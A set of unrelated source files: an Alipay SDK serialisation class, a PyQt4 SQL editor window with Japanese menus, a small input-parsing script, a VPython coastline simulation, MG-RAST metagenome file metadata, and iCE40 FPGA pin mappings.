params['identification_in_belonging_employer'] = self.identification_in_belonging_employer.to_alipay_dict()
else:
params['identification_in_belonging_employer'] = self.identification_in_belonging_employer
if self.out_biz_no:
if hasattr(self.out_biz_no, 'to_alipay_dict'):
params['out_biz_no'] = self.out_biz_no.to_alipay_dict()
else:
params['out_biz_no'] = self.out_biz_no
if self.pay_salary_mode_enum:
if hasattr(self.pay_salary_mode_enum, 'to_alipay_dict'):
params['pay_salary_mode_enum'] = self.pay_salary_mode_enum.to_alipay_dict()
else:
params['pay_salary_mode_enum'] = self.pay_salary_mode_enum
if self.sign_time:
if hasattr(self.sign_time, 'to_alipay_dict'):
params['sign_time'] = self.sign_time.to_alipay_dict()
else:
params['sign_time'] = self.sign_time
if self.status:
if hasattr(self.status, 'to_alipay_dict'):
params['status'] = self.status.to_alipay_dict()
else:
params['status'] = self.status
if self.tax_optimization_mode:
if hasattr(self.tax_optimization_mode, 'to_alipay_dict'):
params['tax_optimization_mode'] = self.tax_optimization_mode.to_alipay_dict()
else:
params['tax_optimization_mode'] = self.tax_optimization_mode
if self.termination_time:
if hasattr(self.termination_time, 'to_alipay_dict'):
params['termination_time'] = self.termination_time.to_alipay_dict()
else:
params['termination_time'] = self.termination_time
if self.two_party_status:
if hasattr(self.two_party_status, 'to_alipay_dict'):
params['two_party_status'] = self.two_party_status.to_alipay_dict()
else:
params['two_party_status'] = self.two_party_status
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = EsignResult()
if 'agreement_id' in d:
o.agreement_id = d['agreement_id']
if 'agreement_url' in d:
o.agreement_url = d['agreement_url']
if 'apply_dutiable_mode_enum' in d:
o.apply_dutiable_mode_enum = d['apply_dutiable_mode_enum']
if 'contractor_code' in d:
o.contractor_code = d['contractor_code']
if 'contractor_name' in d:
o.contractor_name = d['contractor_name']
if 'employee_alipay_logon_id' in d:
o.employee_alipay_logon_id = d['employee_alipay_logon_id']
if 'employer_code' in d:
o.employer_code = d['employer_code']
if 'identification_in_belonging_employer' in d:
o.identification_in_belonging_employer = d['identification_in_belonging_employer']
if 'out_biz_no' in d:
o.out_biz_no = d['out_biz_no']
if 'pay_salary_mode_enum' in d:
o.pay_salary_mode_enum = d['pay_salary_mode_enum']
if 'sign_time' in d:
o.sign_time = d['sign_time']
if 'status' in d:
o.status = d['status']
if 'tax_optimization_mode' in d:
o.tax_optimization_mode = d['tax_optimization_mode']
if 'termination_time' in d:
o.termination_time = d['termination_time']
if 'two_party_status' in d:
o.two_party_status = d['two_party_status']
return o
|
# coding: UTF-8
# !/usr/bin/env python
import os
import common, constants
from PyQt4 import QtCore, QtGui
from editor import Editors, CodeEditor, SqlDatabaseDialog, ConnectionListDocker
from settings import Setting
class MainWindow(QtGui.QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
# エディターのTagWidget
self.editors = None
self.options = Setting()
self.recent_files_menu = None
self.toolbar_menu = None
self.setContentsMargins(0, 0, 0, 0)
self.conn_list = ConnectionListDocker(self)
self.init_layout()
self.new_file()
self.setWindowIcon(QtGui.QIcon(os.path.join(common.get_root_path(), 'logo.ico')))
def about(self):
QtGui.QMessageBox.about(self, "About Syntax Highlighter",
"<p>The <b>Syntax Highlighter</b> example shows how to "
"perform simple syntax highlighting by subclassing the "
"QSyntaxHighlighter class and describing highlighting "
"rules using regular expressions.</p>")
def init_layout(self):
# エディター
self.editors = Editors(self, self.options)
self.setCentralWidget(self.editors)
self.init_menu()
self.init_file_toolbar()
self.init_edit_toolbar()
self.init_db_toolbar()
self.addDockWidget(QtCore.Qt.LeftDockWidgetArea, self.conn_list)
self.conn_list.hide()
def init_menu(self):
# ファイルメニュー
self.init_file_menu()
# 編集メニュー
self.init_edit_menu()
# 検索メニュー
self.init_search_menu()
# 表示メニュー
self.init_view_menu()
self.init_database_menu()
def init_file_menu(self):
file_menu = QtGui.QMenu(u"ファイル(&F)", self)
self.menuBar().addMenu(file_menu)
file_menu.addAction(common.get_icon('new_file'), u"新規(&N)", self.new_file, "Ctrl+N")
file_menu.addAction(common.get_icon('open_file'), u"開く(&O)...", self.open_file, "Ctrl+O")
codec_menu = file_menu.addMenu(u"開き直す")
signal_mapper = QtCore.QSignalMapper(self)
for codec in sorted(CodeEditor.CODEC_LIST):
action = QtGui.QAction(str(codec), codec_menu)
self.connect(action, QtCore.SIGNAL('triggered()'), signal_mapper, QtCore.SLOT('map()'))
signal_mapper.setMapping(action, str(codec))
codec_menu.addAction(action)
codec_menu.addSeparator()
codec_menu_all = QtGui.QMenu(u"すべて(&A)", self)
codec_menu.addMenu(codec_menu_all)
for codec in sorted(QtCore.QTextCodec.availableCodecs(), key=lambda s: str(s).lower()):
action = QtGui.QAction(str(codec), codec_menu_all)
self.connect(action, QtCore.SIGNAL('triggered()'), signal_mapper, QtCore.SLOT('map()'))
signal_mapper.setMapping(action, str(codec))
codec_menu_all.addAction(action)
self.connect(signal_mapper, QtCore.SIGNAL('mapped(QString)'), self.menu_item_clicked)
file_menu.addSeparator()
file_menu.addAction(common.get_icon('save_file'), u"上書き保存(&S)", self.save_file, "Ctrl+S")
file_menu.addAction(common.get_icon('save_as_file'), u"名前を付けて保存(&A)...", self.save_as_file, "Ctrl+Shift+S")
file_menu.addSeparator()
file_menu.addAction(common.get_icon('close_file'), u"閉じる(&C)", self.close_file, "Ctrl+F4")
file_menu.addSeparator()
# 最近使ったファイル
self.recent_files_menu = file_menu.addMenu(u"最近使ったファイル(&F)")
self.recent_folders_menu = file_menu.addMenu(u"最近使ったフォルダ(&D)")
self.init_recent_files_menu()
file_menu.addSeparator()
file_menu.addAction(u"終了(&X)", QtGui.qApp.quit, "Ctrl+Q")
def init_recent_files_menu(self):
self.recent_files_menu.clear()
mapper_recent_files = QtCore.QSignalMapper(self)
for recent_file in self.options.recently.get_files():
action = QtGui.QAction(recent_file, self.recent_files_menu)
self.connect(action, QtCore.SIGNAL('triggered()'), mapper_recent_files, QtCore.SLOT('map()'))
mapper_recent_files.setMapping(action, recent_file)
self.recent_files_menu.addAction(action)
self.connect(mapper_recent_files, QtCore.SIGNAL('mapped(QString)'), self.recent_file_clicked)
self.recent_folders_menu.clear()
mapper_recent_folders = QtCore.QSignalMapper(self)
for recent_folder in self.options.recently.get_folders():
action = QtGui.QAction(recent_folder, self.recent_folders_menu)
self.connect(action, QtCore.SIGNAL('triggered()'), mapper_recent_folders, QtCore.SLOT('map()'))
mapper_recent_folders.setMapping(action, recent_folder)
self.recent_folders_menu.addAction(action)
self.connect(mapper_recent_folders, QtCore.SIGNAL('mapped(QString)'), self.recent_folder_clicked)
def init_edit_menu(self):
edit_menu = QtGui.QMenu(u"編集(&E)", self)
self.menuBar().addMenu(edit_menu)
edit_menu.addAction(common.get_icon('undo'), constants.MENU_EDIT_UNDO, self.editor_undo, QtGui.QKeySequence.Undo)
edit_menu.addAction(common.get_icon('redo'), constants.MENU_EDIT_REDO, self.editor_redo, QtGui.QKeySequence.Redo)
edit_menu.addSeparator()
edit_menu.addAction(u"ソース整形", self.source_reformat, "Ctrl+Shift+F")
edit_menu.addSeparator()
edit_menu.addAction(u"左(先頭)の空白を削除", self.delete_left_space, "ALT+L")
edit_menu.addAction(u"右(末尾)の空白を削除", self.delete_right_space, "ALT+R")
edit_menu.addSeparator()
edit_menu.addAction(u"コメント設定・解除(&C)", self.comment_out, "Ctrl+/")
def init_search_menu(self):
search_menu = QtGui.QMenu(u"検索(&S)", self)
self.menuBar().addMenu(search_menu)
search_menu.addAction(u"検索(&F)...", self.show_find_dialog, "Ctrl+F")
search_menu.addAction(u"次を検索(&N)", self.find_next, "F3")
search_menu.addAction(u"前を検索(&P)", self.find_prev, "Shift+F3")
search_menu.addAction(u"検索文字列の切替(&C)", self.change_find_text, "Ctrl+F3")
search_menu.addSeparator()
bookmark_menu = QtGui.QMenu(u"ブックマーク(&M)", self)
bookmark_menu.addAction(u"ブックマーク設定・解除(&S)", self.set_bookmark, "Ctrl+F2")
bookmark_menu.addAction(u"次のブックマークへ(&A)", self.next_bookmark, "F2")
bookmark_menu.addAction(u"前のブックマークへ(&Z)", self.prev_bookmark, "Shift+F2")
bookmark_menu.addAction(u"ブックマークの全解除(&X)", self.clear_bookmark, "Ctrl+Shift+F2")
bookmark_menu.addAction(u"ブックマークの一覧(&V)", self.view_bookmarks, "ALT+F2")
search_menu.addMenu(bookmark_menu)
search_menu.addAction(u"指定行へジャンプ(&J)...", self.jump_to_line, "Ctrl+J")
def init_view_menu(self):
view_menu = QtGui.QMenu(u"表示(&V)", self)
self.menuBar().addMenu(view_menu)
view_menu.addAction(common.get_icon('win_v_sep'), u"ウインドウを表示/隠す(&B)", self.show_bottom_window, "F4")
view_menu.addAction(common.get_icon('win_h_sep'), u"ウインドウを表示/隠す(&R)", self.show_right_window, "F6")
view_menu.addSeparator()
self.window_menu = QtGui.QMenu(u"ウインドウ(&W)", self)
view_menu.addMenu(self.window_menu)
self.window_menu.addAction(self.conn_list.toggleViewAction())
self.toolbar_menu = QtGui.QMenu(u"ツールバー(&T)", self)
view_menu.addMenu(self.toolbar_menu)
def init_database_menu(self):
db_menu = QtGui.QMenu(u"データベース(&D)", self)
self.menuBar().addMenu(db_menu)
db_menu.addAction(common.get_icon('database_add'), u"データベース追加(&A)", self.connect_database)
db_menu.addAction(common.get_icon('database_list'), u"接続したデータベース(&L)", self.connected_database, "Ctrl+H")
db_menu.addAction(common.get_icon('right_arrow'), u"SQLを実行(&E)", self.execute_sql, "F5")
def init_file_toolbar(self):
toolbar = self.addToolBar(constants.TOOLBAR_FILE)
self.toolbar_menu.addAction(toolbar.toggleViewAction())
toolbar.setIconSize(QtCore.QSize(16, 16))
toolbar.addAction(common.get_icon('new_file'), u"新規(Ctrl+N)", self.new_file)
toolbar.addAction(common.get_icon('open_file'), u"開く(Ctrl+O)", self.open_file)
toolbar.addAction(common.get_icon('save_file'), u"上書き保存(Ctrl+S)", self.save_file)
toolbar.addAction(common.get_icon('save_as_file'), u"名前を付けて保存(Ctrl+Shift+S)", self.save_as_file)
toolbar.addAction(common.get_icon('close_file'), u"閉じる(Ctrl+F4)", self.close_file)
def init_edit_toolbar(self):
toolbar = self.addToolBar(constants.TOOLBAR_EDIT)
self.toolbar_menu.addAction(toolbar.toggleViewAction())
toolbar.setIconSize(QtCore.QSize(16, 16))
toolbar.addAction(common.get_icon('undo'), constants.MENU_EDIT_UNDO, self.editor_undo)
toolbar.addAction(common.get_icon('redo'), constants.MENU_EDIT_REDO, self.editor_redo)
def init_db_toolbar(self, connection=None):
toolbar = self.get_toolbar(constants.TOOLBAR_DATABASE_NAME)
if not toolbar:
toolbar = self.addToolBar(constants.TOOLBAR_DATABASE_NAME)
self.toolbar_menu.addAction(toolbar.toggleViewAction())
toolbar.setIconSize(QtCore.QSize(16, 16))
else:
toolbar.clear()
# データベースに接続する
toolbar.addAction(common.get_icon('database_add'), u"データベースに接続する。", self.connect_database)
toolbar.addAction(common.get_icon('database_list'), u"接続したデータベース", self.connected_database)
# 接続されているデータベース
if connection and connection.database_name:
combo_box = QtGui.QComboBox()
for i, conn in enumerate(connection.get_connections()):
combo_box.addItem(conn.get_connection_name())
if conn.get_connection_name() == connection.get_connection_name():
combo_box.setCurrentIndex(i)
combo_box.setFixedWidth(150)
sp = combo_box.view().sizePolicy()
sp.setHorizontalPolicy(QtGui.QSizePolicy.MinimumExpanding)
combo_box.view().setSizePolicy(sp)
toolbar.addWidget(combo_box)
# SQLを実行する。
toolbar.addAction(common.get_icon('right_arrow'), u"SQLを実行する。", self.execute_sql)
# ウィンドウ分割
toolbar.addSeparator()
toolbar.addAction(common.get_icon('win_v_sep'), u"ウインドウを表示/隠す。(F4)", self.show_bottom_window)
toolbar.addAction(common.get_icon('win_h_sep'), u"ウインドウを表示/隠す。(F6)", self.show_right_window)
def set_window_title(self, title):
self.setWindowTitle(title)
def menu_item_clicked(self, name):
if name and self.get_current_editor().path:
self.open_file(self.get_current_editor().path, name)
def recent_file_clicked(self, file_path):
self.open_file(file_path)
def recent_folder_clicked(self, folder_path):
self.open_file(folder=folder_path)
def new_file(self):
self.editors.add_editor(None)
def open_file(self, path=None, codec=None, folder=None):
self.editors.open_file(path, codec, folder)
def save_file(self):
self.editors.save_file()
def save_as_file(self):
self.editors.save_as_file()
def close_file(self):
self.editors.removeTab(self.editors.currentIndex())
def delete_left_space(self):
code_editor = self.get_current_editor()
if code_editor:
code_editor.delete_left_space()
def delete_right_space(self):
code_editor = self.get_current_editor()
if code_editor:
code_editor.delete_right_space()
def comment_out(self):
code_editor = self.get_current_editor()
if code_editor:
code_editor.comment_out()
def editor_undo(self):
code_editor = self.get_current_editor()
if code_editor:
print 'undo'
code_editor.undo()
def editor_redo(self):
code_editor = self.get_current_editor()
if code_editor:
print 'redo'
code_editor.redo()
def source_reformat(self):
if self.get_current_editor():
self.get_current_editor().reformat()
def show_find_dialog(self):
if self.get_current_editor():
self.get_current_editor().show_find_dialog()
def find_next(self):
if self.get_current_editor():
self.get_current_editor().find_text(False)
def find_prev(self):
if self.get_current_editor():
self.get_current_editor().find_text(True)
def change_find_text(self):
code_editor = self.get_current_editor()
if code_editor:
cursor = code_editor.textCursor()
cursor.hasSelection()
txt = cursor.selectedText()
code_editor.finding.text = txt
code_editor.finding.show_found_text_pos()
def set_bookmark(self):
code_editor = self.get_current_editor()
if code_editor:
code_editor.set_bookmark()
def next_bookmark(self):
code_editor = self.get_current_editor()
if code_editor:
code_editor.next_bookmark()
def prev_bookmark(self):
code_editor = self.get_current_editor()
if code_editor:
code_editor.prev_bookmark()
def clear_bookmark(self):
code_editor = self.get_current_editor()
if code_editor:
code_editor.clear_bookmark()
def view_bookmarks(self):
code_editor = self.get_current_editor()
if code_editor:
code_editor.show_bookmarks_dialog()
def jump_to_line(self):
code_editor = self.get_current_editor()
if code_editor:
code_editor.show_jump_dialog()
def connect_database(self):
sql_tab = self.get_current_tab()
dialog = SqlDatabaseDialog(self, self.options)
ret = dialog.exec_()
if ret == QtGui.QDialog.Accepted:
if sql_tab:
sql_tab.set_connection(dialog.connection)
self.init_db_toolbar(dialog.connection)
self.conn_list.add_connection(dialog.connection)
self.conn_list.setVisible(True)
return dialog.connection
return None
def connected_database(self):
self.conn_list.setVisible(not self.conn_list.isVisible())
def execute_sql(self):
sql_tab = self.get_current_tab()
if sql_tab:
if sql_tab.connection:
sql_tab.execute_sql()
else:
if self.connect_database():
sql_tab.execute_sql()
def show_bottom_window(self):
tab = self.get_current_tab()
if tab:
tab.show_bottom_window()
def show_right_window(self):
tab = self.get_current_tab()
if tab:
tab.show_right_window()
def get_current_editor(self):
if self.editors:
if hasattr(self.editors.currentWidget(), 'code_editor'):
return self.editors.currentWidget().code_editor
return None
def get_current_tab(self):
if self.editors:
return self.editors.currentWidget()
else:
return None
def get_toolbar(self, window_title):
for toolbar in self.findChildren(QtGui.QToolBar):
if toolbar.windowTitle() == window_title:
return toolbar
return None
def closeEvent(self, event):
for i in range(self.editors.count()):
editor = self.editors.widget(i)
editor.close()
event.accept()
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
window = MainWindow()
#window.showMaximized()
window.resize(1224, 800)
window.show()
sys.exit(app.exec_())
|
N = int(input())
def median(N):
N.sort()
if len(N) % 2 == 0:
return (N[len(N) / 2] + N[len(N) / 2 + 1]) / 2
else:
return N[(len(N) + 1) / 2]
Xl = []
for i in range(N):
A, B = map(int, input().split())
X = list(range(A, B + 1))
Xl.append(X)
print(Xl)
|
#
from visual import *
from visual.graph import *
import random
Minx = 0 # min value x axis
Maxx = 200 # max value x axis
Miny = 0 # for y axis
Maxy = 60
g = gdisplay(width=500, height=500, title="Coastline", xtitle='x',ytitle='coast',xmin=Minx, xmax=Maxx, ymin=Miny, ymax=Maxy)
seacoast = gcurve(color=color.yellow)
coast = zeros((200)) # array
for i in range(0, 5000): # All particles dropped
spot = int(200*random.random()) # generate random number
if (spot == 0): # Hitting edge counts as filling hole
if (coast[spot] < coast[spot + 1]):
coast[spot] = coast[spot + 1]
else:
coast[spot]= coast[spot] + 1
else:
if (spot == 199):
if (coast[spot] < coast[spot - 1]):
coast[spot] = coast[spot - 1]
else:
coast[spot]=coast[spot] + 1
else:
if ((coast[spot]<coast[spot - 1])and
(coast[spot]<coast[spot + 1])):
if (coast[spot-1] > coast[spot + 1]):
coast[spot] = coast[spot - 1]
else:
coast[spot] = coast[spot + 1]
else:
coast[spot] = coast[spot] + 1
for i in range(0,200):
seacoast.plot(pos=(i,coast[i])) # plot coastline
|
{
"id": "mgm4458721.3",
"metadata": {
"mgm4458721.3.metadata.json": {
"format": "json",
"provider": "metagenomics.anl.gov"
}
},
"providers": {
"metagenomics.anl.gov": {
"files": {
"100.preprocess.info": {
"compression": null,
"description": null,
"size": 736,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/100.preprocess.info"
},
"100.preprocess.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 189026,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/100.preprocess.passed.fna.gz"
},
"100.preprocess.passed.fna.stats": {
"compression": null,
"description": null,
"size": 309,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/100.preprocess.passed.fna.stats"
},
"100.preprocess.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 3739,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/100.preprocess.removed.fna.gz"
},
"100.preprocess.removed.fna.stats": {
"compression": null,
"description": null,
"size": 303,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/100.preprocess.removed.fna.stats"
},
"205.screen.h_sapiens_asm.info": {
"compression": null,
"description": null,
"size": 477,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/205.screen.h_sapiens_asm.info"
},
"205.screen.h_sapiens_asm.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 177,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/205.screen.h_sapiens_asm.removed.fna.gz"
},
"299.screen.info": {
"compression": null,
"description": null,
"size": 410,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/299.screen.info"
},
"299.screen.passed.fna.gcs": {
"compression": null,
"description": null,
"size": 1634,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/299.screen.passed.fna.gcs"
},
"299.screen.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 120417,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/299.screen.passed.fna.gz"
},
"299.screen.passed.fna.lens": {
"compression": null,
"description": null,
"size": 488,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/299.screen.passed.fna.lens"
},
"299.screen.passed.fna.stats": {
"compression": null,
"description": null,
"size": 309,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/299.screen.passed.fna.stats"
},
"440.cluster.rna97.fna.gz": {
"compression": "gzip",
"description": null,
"size": 14068,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/440.cluster.rna97.fna.gz"
},
"440.cluster.rna97.fna.stats": {
"compression": null,
"description": null,
"size": 306,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/440.cluster.rna97.fna.stats"
},
"440.cluster.rna97.info": {
"compression": null,
"description": null,
"size": 947,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/440.cluster.rna97.info"
},
"440.cluster.rna97.mapping": {
"compression": null,
"description": null,
"size": 244540,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/440.cluster.rna97.mapping"
},
"440.cluster.rna97.mapping.stats": {
"compression": null,
"description": null,
"size": 48,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/440.cluster.rna97.mapping.stats"
},
"450.rna.expand.lca.gz": {
"compression": "gzip",
"description": null,
"size": 137286,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/450.rna.expand.lca.gz"
},
"450.rna.expand.rna.gz": {
"compression": "gzip",
"description": null,
"size": 33446,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/450.rna.expand.rna.gz"
},
"450.rna.sims.filter.gz": {
"compression": "gzip",
"description": null,
"size": 21752,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/450.rna.sims.filter.gz"
},
"450.rna.sims.gz": {
"compression": "gzip",
"description": null,
"size": 228544,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/450.rna.sims.gz"
},
"900.abundance.function.gz": {
"compression": "gzip",
"description": null,
"size": 11982,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/900.abundance.function.gz"
},
"900.abundance.lca.gz": {
"compression": "gzip",
"description": null,
"size": 8583,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/900.abundance.lca.gz"
},
"900.abundance.md5.gz": {
"compression": "gzip",
"description": null,
"size": 16619,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/900.abundance.md5.gz"
},
"900.abundance.ontology.gz": {
"compression": "gzip",
"description": null,
"size": 43,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/900.abundance.ontology.gz"
},
"900.abundance.organism.gz": {
"compression": "gzip",
"description": null,
"size": 25459,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/900.abundance.organism.gz"
},
"900.loadDB.sims.filter.seq": {
"compression": null,
"description": null,
"size": 2102803,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/900.loadDB.sims.filter.seq"
},
"900.loadDB.source.stats": {
"compression": null,
"description": null,
"size": 121,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/900.loadDB.source.stats"
},
"999.done.COG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.COG.stats"
},
"999.done.KO.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.KO.stats"
},
"999.done.NOG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.NOG.stats"
},
"999.done.Subsystems.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.Subsystems.stats"
},
"999.done.class.stats": {
"compression": null,
"description": null,
"size": 687,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.class.stats"
},
"999.done.domain.stats": {
"compression": null,
"description": null,
"size": 36,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.domain.stats"
},
"999.done.family.stats": {
"compression": null,
"description": null,
"size": 2463,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.family.stats"
},
"999.done.genus.stats": {
"compression": null,
"description": null,
"size": 3254,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.genus.stats"
},
"999.done.order.stats": {
"compression": null,
"description": null,
"size": 1225,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.order.stats"
},
"999.done.phylum.stats": {
"compression": null,
"description": null,
"size": 311,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.phylum.stats"
},
"999.done.rarefaction.stats": {
"compression": null,
"description": null,
"size": 22018,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.rarefaction.stats"
},
"999.done.sims.stats": {
"compression": null,
"description": null,
"size": 79,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.sims.stats"
},
"999.done.species.stats": {
"compression": null,
"description": null,
"size": 9388,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458721.3/file/999.done.species.stats"
}
},
"id": "mgm4458721.3",
"provider": "metagenomics.anl.gov",
"providerId": "mgm4458721.3"
}
},
"raw": {
"mgm4458721.3.fna.gz": {
"compression": "gzip",
"format": "fasta",
"provider": "metagenomics.anl.gov",
"url": "http://api.metagenomics.anl.gov/reads/mgm4458721.3"
}
}
} |
import os, csv
from loam import FPGA
from ..lattice import Lattice
from .gpio import Pin, GPIO
from .clock import Clock
from .usart import USART
__all__ = ['ICE40HX1K', 'ICE40HX8K']
__all__ += ['ICE40LP1K', 'ICE40LP8K']
__all__ += ['ICE40UP5K']
class HX(Lattice):
family = 'ice40'
def __init__(self, name, board):
super(HX,self).__init__(name, board)
self.clock = Clock(self)
self.USART = USART
def VQ100(self):
self.package = 'VQ100'
# Note that these are named as bank / pin
#
# The lattice names are different: see iCE40PinoutHX1K.xlsx
GPIO(self, 'IOL_1A', 1)
GPIO(self, 'IOL_1B', 2)
GPIO(self, 'IOL_2A', 3)
GPIO(self, 'IOL_2B', 4)
GPIO(self, 'IOL_3A', 7)
GPIO(self, 'IOL_3B', 8)
GPIO(self, 'IOL_5A', 9)
GPIO(self, 'IOL_5B', 10)
GPIO(self, 'IOL_6A', 12)
GPIO(self, 'IOL_6B', 13)
GPIO(self, 'IOL_7A', 15)
GPIO(self, 'IOL_7B', 16)
GPIO(self, 'IOL_8A', 18)
GPIO(self, 'IOL_8B', 19)
GPIO(self, 'IOL_10A', 20)
GPIO(self, 'IOL_10B', 21)
GPIO(self, 'IOL_12A', 24)
GPIO(self, 'IOL_12B', 25)
# Bank B
GPIO(self, 'IOB_26', 26)
GPIO(self, 'IOB_27', 27)
GPIO(self, 'IOB_28', 28)
GPIO(self, 'IOB_29', 29)
GPIO(self, 'IOB_30', 30)
# 31 32
GPIO(self, 'IOB_33', 33)
GPIO(self, 'IOB_34', 34)
# 35
GPIO(self, 'IOB_36', 36)
GPIO(self, 'IOB_37', 37)
# 38 39
GPIO(self, 'IOB_40', 40)
GPIO(self, 'IOB_41', 41)
GPIO(self, 'IOB_42', 42)
GPIO(self, 'IOB_43', 43) # CDONE
GPIO(self, 'IOB_44', 44) # CRESET_B
GPIO(self, 'IOB_45', 45) # SDO
GPIO(self, 'IOB_46', 46) # SDI
# 47
GPIO(self, 'IOB_48', 48) # SCK
GPIO(self, 'IOB_49', 49) # SS
# Bank R
GPIO(self, 'IOR_51', 51)
GPIO(self, 'IOR_52', 52)
GPIO(self, 'IOR_53', 53)
GPIO(self, 'IOR_54', 54)
# GND 55
GPIO(self, 'IOR_56', 56)
GPIO(self, 'IOR_57', 57)
# VCC 57
GPIO(self, 'IOR_59', 59)
GPIO(self, 'IOR_60', 60)
# VCC 61
GPIO(self, 'IOR_60_GBIN3', 60)
GPIO(self, 'IOR_61_GBIN2', 61)
GPIO(self, 'IOR_62', 62)
GPIO(self, 'IOR_63', 63)
GPIO(self, 'IOR_64', 64)
GPIO(self, 'IOR_65', 65)
# VCC 67
GPIO(self, 'IOR_68', 68)
GPIO(self, 'IOR_69', 69)
# GND 70
GPIO(self, 'IOR_71', 71)
GPIO(self, 'IOR_72', 72)
GPIO(self, 'IOR_73', 73)
GPIO(self, 'IOR_74', 74)
# VPP 75
# Bank T
GPIO(self, 'IOT_78', 78)
GPIO(self, 'IOT_79', 79)
GPIO(self, 'IOT_80', 80)
GPIO(self, 'IOT_81', 81)
GPIO(self, 'IOT_90', 90)
GPIO(self, 'IOT_91', 91)
# 92
GPIO(self, 'IOT_93', 93)
GPIO(self, 'IOT_94', 94)
GPIO(self, 'IOT_95', 95)
GPIO(self, 'IOT_96', 96)
GPIO(self, 'IOT_97', 97)
GPIO(self, 'IOT_99', 99)
GPIO(self, 'IOT_100', 100)
def TQ144(self):
self.package = 'TQ144'
# Special
GPIO(self, "PIOS_00", 70)
GPIO(self, "PIOS_01", 68)
GPIO(self, "PIOS_02", 67)
GPIO(self, "PIOS_03", 71)
# Bank 0
GPIO(self, "PIO0_02", 112)
GPIO(self, "PIO0_03", 113)
GPIO(self, "PIO0_04", 114)
GPIO(self, "PIO0_05", 115)
GPIO(self, "PIO0_06", 116)
GPIO(self, "PIO0_07", 117)
GPIO(self, "PIO0_08", 118)
GPIO(self, "PIO0_09", 119)
# ...
# PIO0_22, 144
# Bank 1
GPIO(self, "PIO1_02", 78)
GPIO(self, "PIO1_03", 79)
GPIO(self, "PIO1_04", 80)
GPIO(self, "PIO1_05", 81)
GPIO(self, "PIO1_06", 87)
GPIO(self, "PIO1_07", 88)
GPIO(self, "PIO1_08", 90)
GPIO(self, "PIO1_09", 91)
GPIO(self, "PIO1_10", 95) # D5
GPIO(self, "PIO1_11", 96) # D4
GPIO(self, "PIO1_12", 97) # D3
GPIO(self, "PIO1_13", 98) # D2
GPIO(self, "PIO1_14", 99) # D1
GPIO(self, "PIO1_15", 101)
